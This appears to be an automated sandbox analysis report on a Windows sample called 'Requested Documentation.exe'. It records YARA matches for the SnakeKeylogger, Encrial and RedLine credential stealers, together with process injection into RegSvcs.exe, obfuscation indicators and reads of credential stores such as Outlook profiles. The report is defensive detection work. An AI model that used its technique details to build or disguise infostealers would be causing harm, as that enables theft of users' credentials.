                  Source: 1.2.RegSvcs.exe.4066458.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.5680000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.5680000.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.2db0bf6.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.408e590.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.408e590.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.2db0bf6.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.2db0bf6.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.4065570.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.4065570.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 1.2.RegSvcs.exe.4065570.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.4065570.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.5680000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.5680000.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.56c0000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.56c0000.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000001.00000002.4192706984.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000000.00000002.1739970349.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: Process Memory Space: RegSvcs.exe PID: 6344, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.5680ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.RegSvcs.exe.5680ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.RegSvcs.exe.4066458.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.RegSvcs.exe.4066458.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 1.2.RegSvcs.exe.2db1ade.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.RegSvcs.exe.2db1ade.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.RegSvcs.exe.408e590.5.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.RegSvcs.exe.408e590.5.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@3/3
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009EA06A GetLastError,FormatMessageW,0_2_009EA06A
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009D81CB AdjustTokenPrivileges,CloseHandle,0_2_009D81CB
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009D87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_009D87E1
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009EB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_009EB3FB
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009FEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_009FEE0D
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009EC397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_009EC397
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_00984E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00984E89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\Requested Documentation.exeFile created: C:\Users\user\AppData\Local\Temp\aut9709.tmpJump to behavior
                  Source: Requested Documentation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\Requested Documentation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: RegSvcs.exe, 00000001.00000002.4194140589.00000000031C0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4194140589.00000000031CF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4194140589.00000000031B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: Requested Documentation.exeVirustotal: Detection: 46%
                  Source: Requested Documentation.exeReversingLabs: Detection: 57%
                  Source: unknownProcess created: C:\Users\user\Desktop\Requested Documentation.exe "C:\Users\user\Desktop\Requested Documentation.exe"
                  Source: C:\Users\user\Desktop\Requested Documentation.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Requested Documentation.exe"
                  Source: C:\Users\user\Desktop\Requested Documentation.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Requested Documentation.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Requested Documentation.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Requested Documentation.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Requested Documentation.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\Requested Documentation.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\Requested Documentation.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\Requested Documentation.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Requested Documentation.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Requested Documentation.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Requested Documentation.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Requested Documentation.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Requested Documentation.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Requested Documentation.exeStatic file information: File size 1090048 > 1048576
                  Source: Requested Documentation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: Requested Documentation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: Requested Documentation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: Requested Documentation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Requested Documentation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: Requested Documentation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: Requested Documentation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: _.pdb source: RegSvcs.exe, 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: Requested Documentation.exe, 00000000.00000003.1736119102.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Requested Documentation.exe, 00000000.00000003.1735017129.0000000003E50000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: Requested Documentation.exe, 00000000.00000003.1736119102.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Requested Documentation.exe, 00000000.00000003.1735017129.0000000003E50000.00000004.00001000.00020000.00000000.sdmp
                  Source: Requested Documentation.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: Requested Documentation.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: Requested Documentation.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: Requested Documentation.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: Requested Documentation.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: 1.2.RegSvcs.exe.5680ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 1.2.RegSvcs.exe.4066458.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 1.2.RegSvcs.exe.2db1ade.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 1.2.RegSvcs.exe.408e590.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_00984B37 LoadLibraryA,GetProcAddress,0_2_00984B37
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009E848F push FFFFFF8Bh; iretd 0_2_009E8491
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009AE70F push edi; ret 0_2_009AE711
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009AE828 push esi; ret 0_2_009AE82A
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009A8945 push ecx; ret 0_2_009A8958
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009AEAEC push edi; ret 0_2_009AEAEE
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009AEA03 push esi; ret 0_2_009AEA05
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041C40C push cs; iretd 1_2_0041C4E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00423149 push eax; ret 1_2_00423179
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041C50E push cs; iretd 1_2_0041C4E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004231C8 push eax; ret 1_2_00423179
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040E21D push ecx; ret 1_2_0040E230
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041C6BE push ebx; ret 1_2_0041C6BF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040BB97 push dword ptr [ecx-75h]; iretd 1_2_0040BBA3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05720080 push ss; retf 1_2_05720026
                  Source: 1.2.RegSvcs.exe.5680ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'yEeYmAhLMoNIB', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 1.2.RegSvcs.exe.4066458.3.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'yEeYmAhLMoNIB', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'yEeYmAhLMoNIB', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 1.2.RegSvcs.exe.2db1ade.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'yEeYmAhLMoNIB', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 1.2.RegSvcs.exe.408e590.5.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'yEeYmAhLMoNIB', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009848D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_009848D7
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_00A05376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00A05376
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009A3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009A3187
                  Source: C:\Users\user\Desktop\Requested Documentation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Requested Documentation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
